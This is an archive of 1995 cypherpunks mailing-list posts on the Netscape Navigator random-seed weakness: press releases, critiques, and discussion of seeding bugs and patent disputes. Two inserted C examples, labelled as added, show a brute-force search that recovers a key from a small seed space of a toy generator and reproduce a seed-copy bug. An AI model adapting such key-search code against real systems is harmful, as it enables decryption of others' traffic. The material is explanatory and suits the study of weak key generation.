If it wasn't for ITAR the Net would already have secure encryption and
authentication, and most such hacker attacks would be impossible (or at 
least impractical).

		Mark






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 19 Sep 95 20:14:06 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: FROM A FRIEND . . .
Message-ID: <Pine.SUN.3.91.950919182936.7667A-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Here is a press release that Netscape has issued (is about to 
issue?) concerning their recent miscue.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------- Forwarded message ----------
*********************************************************************

Potential Vulnerability in Netscape Products - Netscape Responding
Immediately To Upgrade Customers and Minimize Risk of Future Threats

Summary:
During regular monitoring of Internet security newsgroups, Netscape has
discovered a potential vulnerability in the current version of the Netscape
Navigator. Late Sunday evening two UC-Berkeley students posted a message to
the Internet detailing their efforts to reverse engineer some security
capabilities of the Netscape Navigator. Their efforts revealed how the
program generates session encryption keys, enabling them to replicate these
keys with a moderate amount of computing power and decipher messages sent
across the Internet. The potential vulnerability has since been confirmed by
Netscape engineers. With this knowledge an experienced computer programmer
could decrypt messages sent by Netscape Navigator to other computers in a
few hours of computation time.

Netscape secure software has been in use for almost a year on the Internet
by millions of customers and no thefts of actual customer information
protected by our security have been reported. This posting on the Internet
reported a potential vulnerability, not the actual theft of customer
information. Netscape plans to address this vulnerability quickly by
providing updated software as soon as possible via the Internet. An updated
version of Netscape Navigator 1.1 and 1.2 will be available for downloading
on the Internet next week by existing customers. In addition, Netscape
Navigator 2.0, which was announced yesterday and will be available next week
in beta versions, includes this improvement as well as a number of
additional security features.

Detailed Issue:
Current versions of Netscape Navigator use random information to generate
session encryption keys of either 40-bits or 128-bits in length. The random
information is found through a variety of functions that look into a user's
machine for information about how many processes are running, process ID
numbers, the current time in microseconds, etc. The current vulnerability
exists because the size of random input is less than the size of the
subsequent keys. This means that instead of searching through all the 2^128
possible keys by brute force, a potential intruder only has to search
through a significantly smaller key space by brute force. This is a
substantially easier problem to solve because it takes much less compute
time and means 40-bit or 128-bit key strength is substantially reduced.

Solution:
Netscape is already implementing a fix to the specific portion of our
software where this vulnerability exists. We plan to address the problem by
significantly increasing the amount of random information that cannot be
discovered by external sources from approximately 30-bits to approximately
300-bits. In addition, the random information will be made much more
difficult to replicate because we will greatly expand the techniques and
sources used to generate the random information. Once this improvement is
made, protection of the random information will be as strong as the rest of
the security built into Netscape.

Netscape has also begun to engage an external group of world class security
experts who will review our solution to this problem before it is sent to
customers. These experts will validate Netscape's solution and insure that
it is complete and effective in solving this vulnerability. The group will
be used on an ongoing basis to work with Netscape's internal security
experts to review the design and implementation of security in Netscape's
products and to provide an additional measure of assurance that these
products implement the highest levels of security possible.

This discovery does not affect the strength or security of SSL, RC4, or any
other portions of our security implementations. The fix will restore
Netscape security across all products to the true 40-bit level for Export
and true 128-bit level for U.S. Customers intended before this discovery.
Current versions of Netscape Navigator should be replaced with updated
versions that will be made available next week. In addition, the current
version of the Netscape Commerce Server has a similar vulnerability during
its initial key-pair generation. Therefore, a patch will be made available
from Netscape and should be applied by Commerce Server customers to generate
a new key pair and server certificate.

Updating Customers:
Netscape will provide the fix for Export (40 bit) versions of Netscape
Navigator later this week for downloading by customers on the Internet.
Similarly, the Commerce Server patch for Export versions (40 bit) will be
made available from our home page. Because downloading of 128 bit versions
of the software is still not permitted by U.S. law, U.S. customers of
Netscape Navigator, Netscape Navigator Personal Edition and Netscape
Commerce Server using 128 bit versions can request the replacement from
Netscape for delivery through the regular mail.

For additional information or replacements for 128-bit versions of software
that you have already purchased, please call the Netscape Replacement Desk
at 415-528-3600, email replace@netscape.com, or contact your existing
Netscape representative directly. We will inform you immediately when the
updated software is available for download.
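
The "Detailed Issue" paragraph of the release above, worked through as an added example that is not part of the forwarded release and is not Netscape's code: a key can never be stronger than the number of seeds that could have produced it. The mixer, the struct and function names, and the constructed scenario (second and parent PID known to an observer, 16 candidate PIDs) are all assumptions made for the illustration.

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed seed inputs of the kind the release lists (time, process IDs). */
struct seed_inputs { uint32_t sec, usec, pid, ppid; };

/* Inclusive bounds an outside observer can place on each input (assumed). */
struct range { uint32_t lo, hi; };
struct seed_space { struct range sec, usec, pid, ppid; };

/* Stand-in 64-bit mixer (splitmix64 finalizer); not Netscape's generator. */
static uint64_t mix64(uint64_t x)
{
    x += 0x9E3779B97F4A7C15ULL;
    x = (x ^ (x >> 30)) * 0xBF58476D1CE4E5B9ULL;
    x = (x ^ (x >> 27)) * 0x94D049BB133111EBULL;
    return x ^ (x >> 31);
}

/* Deterministically expand the seed inputs into a 128-bit key. */
void derive_key(const struct seed_inputs *s, uint64_t key[2])
{
    uint64_t a = ((uint64_t)s->sec << 32) | s->usec;
    uint64_t b = ((uint64_t)s->pid << 32) | s->ppid;
    key[0] = mix64(a ^ mix64(b));
    key[1] = mix64(key[0] ^ b);
}

static uint64_t width(struct range r) { return (uint64_t)r.hi - r.lo + 1; }

/* Number of distinct seeds, hence distinct keys, the generator can emit. */
uint64_t seed_space_size(const struct seed_space *sp)
{
    return width(sp->sec) * width(sp->usec) * width(sp->pid) * width(sp->ppid);
}

/* Real strength: ceil(log2(seed space)), never more than the nominal size. */
unsigned effective_key_bits(unsigned nominal_bits, const struct seed_space *sp)
{
    uint64_t n = seed_space_size(sp) - 1;
    unsigned bits = 0;
    while (bits < 64 && (n >> bits) != 0)
        bits++;
    return bits < nominal_bits ? bits : nominal_bits;
}

/* Enumerate the seed space; return 1 and fill *out if a seed yields target. */
int recover_seed(const struct seed_space *sp, const uint64_t target[2],
                 struct seed_inputs *out)
{
    uint64_t k[2];
    for (uint64_t s = sp->sec.lo; s <= sp->sec.hi; s++)
    for (uint64_t p = sp->pid.lo; p <= sp->pid.hi; p++)
    for (uint64_t q = sp->ppid.lo; q <= sp->ppid.hi; q++)
    for (uint64_t u = sp->usec.lo; u <= sp->usec.hi; u++) {
        struct seed_inputs c = { (uint32_t)s, (uint32_t)u,
                                 (uint32_t)p, (uint32_t)q };
        derive_key(&c, k);
        if (k[0] == target[0] && k[1] == target[1]) {
            *out = c;
            return 1;
        }
    }
    return 0;
}

/* Constructed scenario: second and parent PID known, 16 candidate PIDs. */
static const struct seed_space DEMO_SPACE = {
    { 811547536u, 811547536u }, { 0u, 999999u }, { 200u, 215u }, { 1u, 1u }
};
static const struct seed_inputs DEMO_SECRET = { 811547536u, 734211u, 211u, 1u };

unsigned demo_effective_bits(unsigned nominal_bits)
{
    return effective_key_bits(nominal_bits, &DEMO_SPACE);
}

/* Returns 1 when the search finds exactly the seed that made the key. */
int demo_key_recovered(void)
{
    uint64_t key[2];
    struct seed_inputs found;
    derive_key(&DEMO_SECRET, key);
    return recover_seed(&DEMO_SPACE, key, &found)
        && found.usec == DEMO_SECRET.usec && found.pid == DEMO_SECRET.pid;
}

int main(void)
{
    printf("seed space: %llu seeds\n",
           (unsigned long long)seed_space_size(&DEMO_SPACE));
    printf("128-bit key, effective bits: %u\n", demo_effective_bits(128));
    printf("40-bit key, effective bits:  %u\n", demo_effective_bits(40));
    printf("key recovered by enumeration: %d\n", demo_key_recovered());
    return 0;
}
```

In this constructed scenario the 40-bit and the 128-bit key come out equally strong, because both are limited by the same seed space rather than by the cipher.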






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 19 Sep 95 11:08:54 PDT
To: andrew_loewenstern@com.swissbank.us.il
Subject: Re: NYT on Netscape Crack
In-Reply-To: <9509191738.AA00941@ch1d157nwk>
Message-ID: <429.9509191807@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com> writes:
> Ian posted the code for the PRNG on August 30th and Stephen Kapp
> noted that it was similar to one in RSAREF.  The PRNG is probably
> fine.  

Yeah I saw both.

> The big flaw here was the collection of seed material.  

This was what I was trying to say.  I was thinking that it would be
useful if they would care to disclose this part of the implementation,
where the entropy comes from, and how they estimate it.

> The bottom line is the WHOLE security subsystem should be published
> for analysis.

Absolutely, but can you see netscape adopting the GPL, with full
source availability?  Of course this would be ideal, but I was hoping
for at least the source as pertaining to the random number generator
which is the essence of the current problem.

> > Or if that doesn't sit well with copyright interests, how about
> > writing up an open spec about how the random number generator works?
> > Then we can critique it.
> 
> Netscape did this with SSL and what happened was the rest of the industry  
> jumped on it before any analysis was done.  Now we are likely stuck with a  
> poor protocol.

Yeah well if open systems is taken to mean, we make up a standard,
tell you about it and if you don't like it well it's too late because
we've blasted it across the internet to the extent that there's no
turning back.

An approach more in keeping with the IETF framework would have been
better.  If it's open standards why not accept existing standards, or
contribute to an IETF working group to decide one which is agreed upon.
I'd call that more open.

> > An algorithm should be something to be proud of, "it's secure, and
> > see:  this is how it works, here are the design criteria, here is
> > how you would attempt to break it, and here is the best predicted
> > attack's cost."
>
> The design may be great, but if the implementation is flawed then
> you aren't much better off.  To attempt to evaluate the security of
> a system you need to be able to inspect the implementation.  Period.

Well yes, but in the current flaw the design wasn't even correct,
although the implementation of that design was.  Both would be ideal
but a design and proof of having audited it would be good if they are
expecting people to trust this thing for megabucks as internet
commerce takes off.

> Netscape may have hot programmers but so far I believe it has become
> self-evident that they know little about crypto and implementing
> cryptosystems.

yup.

> To Netscape's credit, Jeff Weinstein claims that the team
> implementing the security for Navigator 2.0 is completely new and of
> course Netscape has hired Tahir ElGamal, who certainly knows what he
> is doing.  Additionally I would suspect that with all the bad
> publicity they are receiving they would take up Bidzos on RSADSI's
> offer to analyze the source.  So it is entirely possible that
> Navigator 2.0 will be much better.  However, I am not holding my
> breath.

Well I highly doubt they'd GPL the code.  Or even make the code
available.  But it would be really, really nice if a fresh outlook was
taken on this, code is required to trust the thing, as that shows a
willingness to expose the workings, and confidence in the
implementation, and algorithms.  I hope some serious thought goes into
this issue at netscape, about giving out code for their security
implementation.

There are still possibilities for server bugs, and so on.

> Strong crypto is _hard_ to implement properly.  Even if a product is
> using a well-known algorithm there could be any number of subtle
> flaws that can destroy any security offered by such algorithm.  You
> can't just toss in RSA, IDEA, RC-4, DES, etc... and claim the thing
> is secure.

No, you can't.

Sadly, I presume that they have no intention of releasing source.  So
we'll have to be content with RSADSI security audit.  Or another
break.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Tue, 19 Sep 95 03:16:22 PDT
To: Jeff Weinstein <jsw@neon.netscape.com>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <43lu3k$7q6@tera.mcom.com>
Message-ID: <Pine.SOL.3.91.950919185921.17727B-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On 19 Sep 1995, Jeff Weinstein wrote:

> In article <199509190355.XAA01329@frankenstein.piermont.com>, perry@piermont.com (Perry E. Metzger) writes:
> > I suspect that there are far more flaws in Netscape. String buffer
> > overflows are another good guess here -- they are probably rampant
> > through the code both for the browser and the commerce server they
....
>   Sigh.  For your information the security code for 1.x versions of
> netscape was not even written by someone from NCSA.  The current
> security team (which does not include the person who did the 1.x
> version) also does not include anyone from NCSA.  While I can't

I will defend Netscape's code on the point about the RNG even though I 
have not seen any.  I assume the Netscape code is quite large and each 
release would have to pass various functionality tests.  How can you test 
that the RND seeding is wrong?  You have to actually look at the code, the 
numbers coming out are still random.  As of last week I was told by
Mike_Spreitzer.PARC@xerox.com that the random number generator seed 
routine in my DES library was only copying in 4 bytes of passed data 
instead of 8.  Given des_cblock data;, it was

memcpy(init,data,sizeof(data));

it should have been

memcpy(init,data,sizeof(des_cblock));

Rather hard to notice unless you know that des_cblock is passed as a 
pointer and even this can be compiler dependent.

Now I had not noticed this, my library runs like a charm and things 
appear random from the random number generator.  This sort of error can 
only be checked by reading the code and specifically looking at critical 
routines like the RNG seeding routines.  The advantage of my code 
being public is that someone like Mike can have a look and pick up 
problems like this.  The moral of the story I suppose is to be 
paranoid about checking routines relating to RNG.

What would be interesting is to see if packages like PEM use 
similar simple systems for generating random data.  Any of the systems 
that do digital envelopes are relying on libraries to provide random data 
for encryption keys.  At least with the old 'enter passwd' type 
encryption there was a bit of secret random data coming from a human, 
pity about packet watchers seeing those characters as they fly over the 
net :-)

eric (who has also been burned by dodgy RNG seed routines in the past and
      so now uses a rather extreme system involving MD5 and lots of state :-).
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)
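
The seed-copy bug described in the message above, as an added example that is not part of the original post or of Eric's library: seed_buggy, seed_fixed and seed_bytes_used are hypothetical names, and only des_cblock and the two sizeof expressions come from the message. Since a short-seeded generator still produces random-looking output, the check counts how many seed bytes actually reach the state; on a 64-bit build the pointer is itself 8 bytes, which hides the truncation.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef unsigned char des_cblock[8];   /* the 8-byte type named in the post */

/* GCC and Clang now warn about sizeof on an array parameter; the warning is
 * silenced here only so the original mistake can be reproduced as written. */
#if defined(__GNUC__)
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wsizeof-array-argument"
#endif

/* Buggy form: a "des_cblock data" parameter is really "unsigned char *", so
 * sizeof(data) is the pointer size (4 on the 32-bit systems of 1995). */
size_t seed_buggy(unsigned char init[8], des_cblock data)
{
    size_t n = sizeof(data);      /* the size used by the post's first memcpy */
    if (n > 8)
        n = 8;                    /* never write past the 8-byte state */
    memset(init, 0, 8);           /* uncopied state bytes stay at a fixed value */
    memcpy(init, data, n);
    return n;
}

#if defined(__GNUC__)
#pragma GCC diagnostic pop
#endif

/* Fixed form: take the size of the type, which is 8 on every platform. */
size_t seed_fixed(unsigned char init[8], des_cblock data)
{
    memcpy(init, data, sizeof(des_cblock));
    return sizeof(des_cblock);
}

typedef size_t (*seed_fn)(unsigned char init[8], des_cblock data);

/* Review check: flip one seed byte at a time and count how many of the eight
 * positions change the resulting state. Anything below 8 means seed material
 * is being dropped, however random the generator's output looks. */
int seed_bytes_used(seed_fn fn)
{
    int used = 0;
    for (int i = 0; i < 8; i++) {
        des_cblock a = {0}, b = {0};
        unsigned char sa[8], sb[8];
        b[i] = 0xFF;
        fn(sa, a);
        fn(sb, b);
        if (memcmp(sa, sb, 8) != 0)
            used++;
    }
    return used;
}

int main(void)
{
    printf("pointer size on this build: %u bytes\n",
           (unsigned)sizeof(unsigned char *));
    printf("seed bytes used, buggy copy: %d\n", seed_bytes_used(seed_buggy));
    printf("seed bytes used, fixed copy: %d\n", seed_bytes_used(seed_fixed));
    return 0;
}
```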





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 19 Sep 95 17:33:44 PDT
To: cypherpunks@toad.com
Subject: New Kid On The Block
Message-ID: <Pine.SUN.3.90.950919193110.24166C-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain




Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

---------- Forwarded message ----------
Date: Tue, 19 Sep 95 14:25:20 PDT
From: Bob Williams <bobw@netmanage.com>
To: "Larry J. Hughes Jr." <hughes@indiana.edu>,
    Adam Shostack <adam@bwh.harvard.edu>
Cc: ssl-talk@netscape.com
Subject: Re: details on security bug? 

The problems with SSL extend beyond the random
number generation hole widely publicized in the press today.

SSL 2.0 poses both financial and interoperability barriers
to widespread use of Cryptography that will be addressed
in the very near future.
 

-------------------------------
NETMANAGE, Inc.
Press Release
FOR IMMEDIATE RELEASE

Contact: Donna Loughlin, NetManage, (408) 973-7171
              Donna@netmanage.com

NetManage Licenses Public Key Cryptography from CYLINK

The Two Firms to Promote an Open Interface for Internet Security which 
Corrects Flaws and Eliminates Financial and Interoperability Barriers for 
Cryptography.

Cupertino, California - September 19, 1995 - NetManage, the leader in TCP/IP 
Applications for Windows and Internet productivity software, announced today 
that it has signed a licensing agreement with CYLINK Corporation for 
technology which incorporates the fundamental patents covering public 
key cryptography.   NetManage will be providing support for public key 
authentication and data encryption as a fundamental component of its 
Chameleon Enterprise strategy.  The two firms further announced that they 
plan to provide support for an open interface for Internet security which 
will address recent flaws found in cryptographic implementations used by 
Netscape Communications and other unpublicized security holes in existing 
Internet security protocols. The standard is further intended to eliminate 
the financial and interoperability barriers that have been holding back 
widespread use of public key cryptography on the Internet.

In a separate announcement released yesterday, CYLINK announced that it had 
prevailed in a patent lawsuit with RSA Data Security which found that RSA 
had infringed U.S. patents held by CYLINK which cover all known 
implementations of public key technology.

About Internet Security
-----------------------
Establishing a secure Internet connection requires any computer software 
program to perform two functions: Authentication of the user, and bulk 
encryption of data.  

The Authentication phase allows two computers to verify that each party is 
who they claim to be, and that they are authorized to enter into a secure 
communications session.   This is done via "public key" technology, which 
was developed and patented originally by Stanford University and licensed 
exclusively by CYLINK Corporation.

During the authentication phase the two computers also agree upon the 
encryption method to be used for bulk data transfer during the time the two 
computers are communicating data between one another.  These ciphers can be 
implemented in either software or hardware, including PCMCIA cards.  Popular 
encryption ciphers include DES, Triple-DES, SAFER, IDEA, Skipjack, RC-2 and 
RC-4 and are available from a variety of software and hardware vendors.

Limitations of Current Internet Security Standards
--------------------------------------------------
Current implementations of security protocols proposed as standards by 
Netscape Communications and RSA Data Security, Inc. include security flaws 
and fail to fully accommodate open and interoperable secure communications 
between computers which use different bulk encryption ciphers.  These 
problems have limited the adoption of Internet security as a widespread 
interoperable feature of all Internet software and hardware products 
including end-user applications, servers, firewalls, and secure routers.

NetManage and CYLINK, along with other major software and hardware 
developers, will be announcing next week the release of a publicly available 
security implementation which allows for 'plug & play' interoperability for 
users of Internet security, and the endorsement of protocol extensions which 
improve the reliability of current proposed Internet security standards.  
This open implementation will not lock software or hardware developers into 
the use of encryption technology from any one vendor.

Related APIs, key exchange technology, and encryption will be made publicly 
available to other software and hardware developers.   Licensing will 
include source code and no per-copy royalty fees.

About NetManage
---------------
NetManage Inc., the fastest growing software company in the United States, 
develops, markets and supports an integrated set of Internet-based 
applications, servers and development tools for Microsoft Windows, Windows 
95 and Windows NT.  NetManage software allows corporations to facilitate 
communication, sharing of information and collaboration between workgroups 
using Internet technology. The company's award winning products include 
Chameleon, Internet Chameleon and ECCO. NetManage is a public company, whose 
shares are traded on the NASDAQ under the ticker symbol NETM.  Its products 
are sold world-wide by NetManage's direct sales force and authorized channel 
partners.

About CYLINK
------------
CYLINK Corporation is the world's largest provider of enterprise-wide 
network information security products and wireless communications.  CYLINK 
is the exclusive holder of the fundamental patents which broadly claim the 
invention of public-key cryptography (Diffie-Hellman, Hellman-Merkle, and 
Hellman-Pohlig) and which were originally developed at Stanford University.  
Headquartered in Sunnyvale, California, CYLINK serves Fortune 500 companies, 
financial institutions and government agencies.  Licensees of CYLINK 
technology include CISCO Systems, and other prominent hardware and software 
developers.

# # #






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 19 Sep 95 16:46:58 PDT
To: cypherpunks@toad.com
Subject: Re: NSA and Netscape Crack
Message-ID: <199509192342.TAA25539@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim wrote:

>> If the "flaws" are being found by our group, as John notes, just what is
>> the NSA doing in the _second_ role it is supposed to have, its "COMSEC,"
>> or communications security, role?

and then Thomas wrote:

>Gee Tim, NSA is "helping" us out by creating Clipper and new key escrow 
>mechanisms ;)
>
>"I'm from the NSA, I'm here to help your crypto..."

In the relatively short time I've been on this list, Cypherpunks
have bruted, and then found a weakness in, two kinds of Netscape
software.
[A fine public service, IMO. Congrats to all involved.]

I don't expect to know NSA's specific brute-force capability, but
does anyone know if the NSA has *ever* found a glaring weakness in
software and then told its author(s) or owner(s) about it? Do "we"
perform the "COMSEC" role Tim was speaking of better than the NSA?
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

-----END PGP SIGNATURE-----
Regards, Jim Ray

"Censorship reflects society's lack of confidence in itself. It is
a hallmark of an authoritative regime." --  Justice Potter Stewart 
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 19 Sep 95 11:09:19 PDT
To: cypherpunks@toad.com
Subject: Re: (Yet Another?) Netscape Crack Web page
In-Reply-To: <9509191431.AA23188@hplyot.obspm.fr>
Message-ID: <9509191808.AA24749@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



 >   http://hplyot.obspm.fr/~dl/netscapesec/

I have designed and added what I consider a nice looking logo for that
page, have a look :-)

{I'm not an artist though, but xv, xpaint and patience can make wonders}

Regards
dl

-- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 20:41:04 PDT
To: cypherpunks@toad.com
Subject: response to netscape's press release
Message-ID: <199509200336.UAA28871@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I plan on releasing a press release regarding the misleading
statements made by Netscape in their statement about the seed bug,
announcing the web page describing my objections in detail. The document is
http://www.c2.org/hacknetscape/critique.phtml detailing my objections
to their statements. I would appreciate comments, corrections, and
criticisms. Thanks.
	(The press release will not be written in the style of the web
page. ;-)


                             IN REPLY TO NETSCAPE

   Netscape announced that they are going to "fix" the problem. In
   traditional Internet style, I will respond to their post.

With this knowledge, an experienced computer programmer could decrypt
messages sent by Netscape Navigator to other computers in a few hours
of computation time.

   "a few hours"? Ian and David's program generates keys in 25 seconds.

The random information is found through a variety of functions
that look into a user's machine for information about how many
processes are running, process ID numbers, the current time in
microseconds, etc.

   Specifically, the Parent Process ID, the Process ID, and the time in
   microseconds. See the exploit code for more details.

The current vulnerability exists because the size of random input is
less than the size of the subsequent keys.

   The vulnerability exists because the random input isn't random. Since
   when is the time "random"? I'm sure a few physicists would love to see
   your theories on that one. (Berkeley Standard Time notwithstanding)

Once this improvement is made, protection of the random information
will be as strong as the rest of the security built into Netscape
Navigator.

   That's not saying much, considering that the security community has
   not had a chance to independently verify the security in Netscape
   Navigator.

Netscape has also begun to engage an external group of world-class
security experts who will review our solution to this problem before
it is sent to customers.

   So after someone violates Netscape Navigator's security do they decide
   to have an external group verify their code. (Note that they still
   don't plan on making it available for the security community at large
   to review). According to RSADSI's Jim Bidzos, his company offered to
   review Netscape's security when it was first introduced, but Netscape
   declined. "They're asking us to review it this time," he said.

This discovery does not affect the strength or security of SSL (Secure
Sockets Layer), RC4, or any other portions of our security
implementations.

   True, but this implies that SSL is a secure protocol, which has been
   shown to be false.

   At the beginning of their release:

Netscape secure software has been in use for almost a year on the
Internet by millions of customers and no thefts of actual customer
information protected by our security have been reported - this
posting on the Internet reported a potential vulnerability, not the 
actual theft of customer information.

   Yes, Netscape is very lucky that Ian and David are students, and not  
   criminals. I sincerely hope that the next time someone finds a hole in
   Netscape that it's someone who would rather win a free T-shirt than  
   steal lots of money.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Tue, 19 Sep 95 17:37:33 PDT
To: cypherpunks@toad.com
Subject: Re: ftp://www.brooks.af.mil/pub/unix/utils/des.tar
In-Reply-To: <9509191440.AA18495@tis.com>
Message-ID: <9509200037.AA01721@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



I can second that notion. There are a good many people
in all sorts of sectors of the government who can easily
be brought to frothing over Mr. Freeh & his pals at the NSA's
position on weak security systems. They like weakness, and
anyone with two brain cells to rub together who's interested
in good security rather rapidly ends up coming to the
conclusion that the FBI and the NSA aren't doing them any
real favors.

Basically IMHO, Tim May called it right when he said they're more
interested in snooping than securing. I've believed that
for a long, long time now. It still manages to annoy me
seriously whenever I think about it.

The vulnerabilities that most military systems suffer from
are both staggering and frightening, and it is criminal
that the NSA has so seriously abrogated its security
role in the public and private sectors. I personally believe
it's going to take a rather massive info-terrorist
attack before the control-freak crowd that's driving
weak security takes a back seat. Worms from Libyan
programmers anyone?

Strong cryptographic systems are an integral part of
strong security systems. The recent netscape crack
shows why you can't have one without the other pretty
well.

If good security means ceding some perceived control
over your populace, you should probably be examining
whether your populace wanted you to control them in
the first place it seems to me.

Unfortunately the anti-security crowd is firmly in control
of the organs of the government, and does a damn good job
spreading its propaganda to dupes in the press. Stuff
like the recent kneejerk "CyberPorn" crap and governmental
actions & reactions in that area towards limiting civil
liberties and security technology are great examples of it.

Meanwhile, I think the US is starting to slip behind the
curve in software technology for encryption & the like...
This will probably prove interesting in the future, especially
if the CPU tossed at key escrow & the like turns up more
surprises.


Tim Scanlon


________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Standing Turtle <standing.turtle@internetmci.com>
Date: Tue, 19 Sep 95 17:50:37 PDT
To: cypherpunks@toad.com
Subject: Public Key Partners Dissolved!!!!!
Message-ID: <01HVH2IN4TDE8WWXN7@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain




CYLINK CLAIMS SHARE OF RSA TECHNOLOGY
An arbitration ruling has awarded Cylink Corp. control over two Stanford
University patents on public-key encryption technology used by RSA Data
Security Inc. following the dissolution of the companies' five-year
partnership.  Cylink says it plans to seek royalties from companies that
have licensed the software code from RSA and are redistributing it.  The
arbitrators ruled that RSA's right to sublicense the software expired in
1990.  (Wall Street Journal 19 Sep 95 B7)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Tue, 19 Sep 95 20:59:31 PDT
To: cypherpunks@toad.com
Subject: PGP back in legal limbo?
Message-ID: <9509200359.AA07322@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> WSJ, Sept 19, 1995.
 
> Cylink Claims Right To Key Technology Involving
> Encryption
 

> ... The arbitrators
> ruled that RSA hasn't had the right to sublicense the
> Stanford patents since 1990.


>Since PKP (and Bidzos, now president of
>RSA) always said that DH covered all public key encryption,
>it would seem that any RSA licensee would also need a license
>from Cylink.


So, I suppose this invalidates the RSA agreement that allows PGP to 
be distributed?  What "fortunate" timing for the pro GAK folks! Okay,
everybody in US, erase your copies, before the Feral government comes 
to get you.......
Rick F. Hoselton  (who doesn't claim to present opinions for others)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Tue, 19 Sep 95 18:14:07 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Change of address {No crypto content}
Message-ID: <Pine.SUN.3.91.950919211107.21745A-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Just to announce that I have a new address.  No more VAX/VMS, hello Unix.
Donations of nice procmail files, and unix hints for the re-clueless 
(I last had an account on a Unix machine in 1980), most welcome.

If you send me mail in the next few days and I don't reply, it's either 
because I fiddled wrong, or because I couldn't find a terminal in Pittsburg.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | PLEASE NOTE NEW E-MAIL:
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | 
Coral Gables, FL 33124 USA | It's hot here.  
A HOME AT LAST: http://viper.law.miami.edu/~froomkin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Tue, 19 Sep 95 18:53:47 PDT
To: cypherpunks@toad.com
Subject: Stand up and be heard!
Message-ID: <199509200153.VAA09233@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Yes, I'm still working on a magazine, I still need authors! Write
about cryptography and coverups and clipper and whatever else you
find interesting, and write about it!  Become rich and famous! 
(although the rich and famous part won't be a result of
writing for TCW...)   I also need reporters to write blurbs about
things that happen.   If interested, mail me privately at 
dr261@cleveland.freenet.edu.. not on the list.

--
Tobin Fricke (aka LightRay)       The Digital Forest BBS (714)586-6142
dr261@kanga.ins.cwru.edu          KE6WHF Amateur Radio, 1:103/925 fido




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Tue, 19 Sep 95 19:10:33 PDT
To: libernet-d@dartmouth.edu
Subject: WWW: Unabomber Manifesto
Message-ID: <199509200210.WAA29968@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain




